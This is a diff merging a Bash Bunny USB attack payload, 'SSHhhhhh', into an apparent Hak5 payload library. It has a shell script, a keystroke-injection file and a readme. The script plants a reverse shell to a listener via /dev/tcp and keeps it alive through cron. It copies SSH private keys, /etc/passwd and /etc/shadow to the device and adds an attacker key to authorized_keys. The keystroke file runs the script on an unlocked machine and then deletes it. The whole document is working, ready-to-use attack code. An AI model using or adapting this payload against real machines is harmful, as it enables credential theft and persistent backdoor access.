Merge pull request #375 from WWVB/master

Added SSSHhhhhh (Linux)

payloads/library/remote_access/SSHhhhhh-(Linux)/boom.sh

@@ -0,0 +1,48 @@
+#!/bin/bash
+
+# Main Payload
+
+# Set variables for METERPRETER Reverse_TCP Session, CRON schedule, Attacker's RSA Key, etc..
+RSA_KEY='PLACEHOLDER-FOR-RSA-PUBLIC-KEY' # replace with the contents of ~/.ssh/id_rsa.pub or whatever your RSA public key file is named
+REVERSESHELL=true
+LHOST='10.20.20.104'  # Reverse Shell listening host IP
+LPORT='4444'   # Reverse Shell listening host port
+CRON='30 */1 * * *'  # Just the timing portion of the CRON job
+ATTACKER_HOST='engineering@kali-2'  # Tail end of RSA key from above.  Do not include spaces
+DT=$(date "+%Y.%m.%d-%H.%M.%S")
+DN=/media/$USER/BashBunny/loot/$USER-$HOSTNAME-$DT
+
+if [ "$REVERSESHELL" = true ] ; then
+    # Create reverse shell script
+    echo "#!/bin/bash"> .config/rs.sh ;
+    echo "bash -i >& /dev/tcp/$LHOST/$LPORT 0>&1">> .config/rs.sh ;
+    chmod +x /home/$USER/.config/rs.sh ;
+
+    # Add task to CRON that launches the Reverse_TCP script on a schedule  for persistence
+    crontab -l > crontab.tmp ;
+    if grep -Fq .config/rs.sh crontab.tmp; then
+        echo 'Update in progress.'
+    else
+        echo "$CRON /home/$USER/.config/rs.sh" >> crontab.tmp ;
+        crontab crontab.tmp ;
+    fi
+    rm -f crontab.tmp ;
+fi
+
+# Smash & Grab the loot!!  (Get what you can now and work on PrivEsc later)
+mkdir $DN ;
+ip addr > $DN/ip-addr.txt ;
+whoami > $DN/whoami.txt ;
+cat /proc/net/arp > $DN/arp.txt ;
+cat /etc/passwd > $DN/etc-passwd.txt ;
+cat /etc/shadow > $DN/etc-shadow.txt ;
+uname -a > $DN/uname-a.txt ;
+route -n > $DN/route-n.txt ;
+cp  /home/$USER/.ssh/* $DN/. ;
+
+# Add Attacker's RSA key to .ssh/authorized_keys for additional persistence
+if grep -Fq $ATTACKER_HOST .ssh/authorized_keys ; then
+    echo 'Update almost completed.'
+else
+    echo $RSA_KEY >> .ssh/authorized_keys ;
+fi

payloads/library/remote_access/SSHhhhhh-(Linux)/payload.txt

@@ -0,0 +1,54 @@
+# Title:         SSHhhhhh
+# Description:   Exfiltrates files from user's .ssh folder to Bash Bunny via USB & adds backdoors
+# Author:        WWVB
+# Props:         Hak5Darren, hak5peaks
+# Version:       1.1
+# Category:      Exfiltration w/Persistence
+# Target:        Linux Ubuntu 18.04 LTS
+# Attackmodes:   HID, Storage
+
+DRIVE_LABEL="BashBunny"
+
+#!/bin/bash
+
+LED SETUP
+ATTACKMODE HID STORAGE
+GET SWITCH_POSITION
+
+LED  STAGE1
+QUACK DELAY 500
+QUACK CTRL-ALT t
+QUACK DELAY 100
+
+# Drop primary payload on the box
+QUACK STRING cp /media/\$USER/$DRIVE_LABEL/payloads/$SWITCH_POSITION/boom.sh .
+QUACK ENTER
+QUACK DELAY 50
+
+QUACK STRING chmod +x boom.sh
+QUACK ENTER
+QUACK DELAY 50
+
+LED ATTACK
+
+# Light the fuse and wait!!
+QUACK STRING ./boom.sh
+QUACK ENTER
+QUACK DELAY 1000
+
+# Cleanup
+LED CLEANUP
+QUACK STRING rm boom.sh
+QUACK ENTER
+QUACK DELAY 100
+
+# Bye Felicia!
+QUACK STRING umount '/media/$USER/$DRIVE_LABEL'
+QUACK ENTER
+QUACK DELAY 25
+
+QUACK STRING exit
+QUACK ENTER
+QUACK DELAY 25
+
+LED FINISH

payloads/library/remote_access/SSHhhhhh-(Linux)/readme.md

@@ -0,0 +1,32 @@
+# SSHhhhhh
+
+## Author: WWVB
+## Version: Version 1.0
+
+## Description
+
+## Target =  Unlocked Linux machine (only tested on Ubuntu 18.04 LTS)
+Base install of OS, plus OPENSSH-SERVER & NET-TOOLS (if NET-TOOLS is not installed, the route command will not return data [nothing major])
+
+## Loot =      Contents of ~/$USER/.ssh folder (pub/priv RSA keys, known_hosts, etc..)
+  whoami
+  
+  ip addr
+  
+  arp data
+  
+  route -n
+  
+  /etc/passwd
+  
+  /etc/shadow (on the off chance you get a root terminal)
+  
+  uname -a
+
+## Two opportunites for persistence are injected:
+
+  Attacker's RSA key is added to ~/$USER/.ssh/authorized_keys (aka I'll Call You)
+
+  Reverse_TCP shell script is dropped in the ~/$USER/.config folder and a CRON job added that calls it on a schedule (aka Call Me Later)
+
+## Configuration = HID STORAGE